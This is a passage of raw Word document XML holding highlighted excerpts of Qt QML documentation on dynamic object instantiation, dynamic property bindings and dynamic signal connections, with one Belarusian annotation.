          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB63D0" w:rsidRPr="008D4C56" w:rsidRDefault="00BB63D0" w:rsidP="002230B8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2382" w:name="dynamic-object-instantiation"/>
      <w:bookmarkStart w:id="2383" w:name="_Toc483001043"/>
      <w:bookmarkStart w:id="2384" w:name="_Toc483004032"/>
      <w:bookmarkStart w:id="2385" w:name="_Toc483604384"/>
      <w:bookmarkStart w:id="2386" w:name="_Toc483605604"/>
      <w:bookmarkEnd w:id="2382"/>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dynamic Object Instantiation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2383"/>
      <w:bookmarkEnd w:id="2384"/>
      <w:bookmarkEnd w:id="2385"/>
      <w:bookmarkEnd w:id="2386"/>
    </w:p>
    <w:p w:rsidR="00BB63D0" w:rsidRPr="00BB63D0" w:rsidRDefault="00BB63D0" w:rsidP="00BB63D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML provides a number of ways to dynamically create and manage QML objects.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB63D0" w:rsidRPr="00BB63D0" w:rsidRDefault="00BB63D0" w:rsidP="00BB63D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Objects can be created dynamically </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">from within </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>imperative</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> JavaScript code</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in various ways. See </w:t>
      </w:r>
      <w:hyperlink r:id="rId2669" w:history="1">
        <w:r w:rsidRPr="00BB63D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Dynamic QML object creation from JavaScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> for more details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB63D0" w:rsidRPr="00BB63D0" w:rsidRDefault="00BB63D0" w:rsidP="00BB63D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick provides the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2670" w:history="1">
        <w:r w:rsidRPr="00BB63D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Loader</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId2671" w:history="1">
        <w:r w:rsidRPr="00BB63D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Repeater</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId2672" w:history="1">
        <w:r w:rsidRPr="00BB63D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId2673" w:history="1">
        <w:r w:rsidRPr="00BB63D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>GridView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId2674" w:history="1">
        <w:r w:rsidRPr="00BB63D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PathView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> types which also </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>support dynamic object management</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and provide a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>declarative API</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB63D0" w:rsidRPr="00BB63D0" w:rsidRDefault="00BB63D0" w:rsidP="00BB63D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Please see the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2675" w:history="1">
        <w:r w:rsidRPr="00BB63D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>performance guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> for more information on using dynamic instantiation and lazy initialization to improve application performance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB63D0" w:rsidRPr="002230B8" w:rsidRDefault="00BB63D0" w:rsidP="002230B8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2387" w:name="dynamic-bindings"/>
      <w:bookmarkStart w:id="2388" w:name="_Toc483001044"/>
      <w:bookmarkStart w:id="2389" w:name="_Toc483004033"/>
      <w:bookmarkStart w:id="2390" w:name="_Toc483604385"/>
      <w:bookmarkStart w:id="2391" w:name="_Toc483605605"/>
      <w:bookmarkEnd w:id="2387"/>
      <w:r w:rsidRPr="002230B8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dynamic Bindings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2388"/>
      <w:bookmarkEnd w:id="2389"/>
      <w:bookmarkEnd w:id="2390"/>
      <w:bookmarkEnd w:id="2391"/>
    </w:p>
    <w:p w:rsidR="00BB63D0" w:rsidRPr="00BB63D0" w:rsidRDefault="00490E7E" w:rsidP="00BB63D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2676" w:history="1">
        <w:r w:rsidR="00BB63D0" w:rsidRPr="00BB63D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Property bindings</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BB63D0" w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a fundamental feature of QML. </w:t>
      </w:r>
      <w:r w:rsidR="00BB63D0" w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Typically, a property is initialized with its binding</w:t>
      </w:r>
      <w:r w:rsidR="00BB63D0" w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. However, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2677" w:history="1">
        <w:r w:rsidR="00BB63D0" w:rsidRPr="00BB63D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Binding</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BB63D0" w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> type and </w:t>
      </w:r>
      <w:hyperlink r:id="rId2678" w:anchor="binding-method" w:history="1">
        <w:r w:rsidR="00BB63D0" w:rsidRPr="00BB63D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.binding()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BB63D0" w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function </w:t>
      </w:r>
      <w:r w:rsidR="00BB63D0" w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">allows the client to dynamically </w:t>
      </w:r>
      <w:r w:rsidR="00BB63D0" w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bind properties from any object at run-time</w:t>
      </w:r>
      <w:r w:rsidR="00BB63D0" w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidR="00BB63D0" w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modify the binding target when required</w:t>
      </w:r>
      <w:r w:rsidR="00BB63D0" w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or when it becomes available).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB63D0" w:rsidRPr="002230B8" w:rsidRDefault="00BB63D0" w:rsidP="002230B8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2392" w:name="dynamic-signal-connections"/>
      <w:bookmarkStart w:id="2393" w:name="_Toc483001045"/>
      <w:bookmarkStart w:id="2394" w:name="_Toc483004034"/>
      <w:bookmarkStart w:id="2395" w:name="_Toc483604386"/>
      <w:bookmarkStart w:id="2396" w:name="_Toc483605606"/>
      <w:bookmarkEnd w:id="2392"/>
      <w:r w:rsidRPr="002230B8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dynamic Signal Connections</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2393"/>
      <w:bookmarkEnd w:id="2394"/>
      <w:bookmarkEnd w:id="2395"/>
      <w:bookmarkEnd w:id="2396"/>
    </w:p>
    <w:p w:rsidR="00BB63D0" w:rsidRPr="00BB63D0" w:rsidRDefault="00BB63D0" w:rsidP="00BB63D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML supports dynamic signal connections through a signal's </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connect() method</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The </w:t>
      </w:r>
      <w:hyperlink r:id="rId2679" w:history="1">
        <w:r w:rsidRPr="00BB63D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> module provides the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>convenience </w:t>
      </w:r>
      <w:hyperlink r:id="rId2680" w:history="1">
        <w:r w:rsidRPr="00BB63D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> type</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which allows setting up a signal connection </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>involving an object which isn't part of the static object hierarchy</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It also allows the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connection to be dynamically retargeted at runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which allows an </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>application to process different signal notifications with different functions depending on the program state</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r w:rsidRPr="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>фундаментальныя аспекты праграмных тэхналогій</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB63D0" w:rsidRPr="00BB63D0" w:rsidRDefault="00BB63D0" w:rsidP="00BB63D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB63D0">
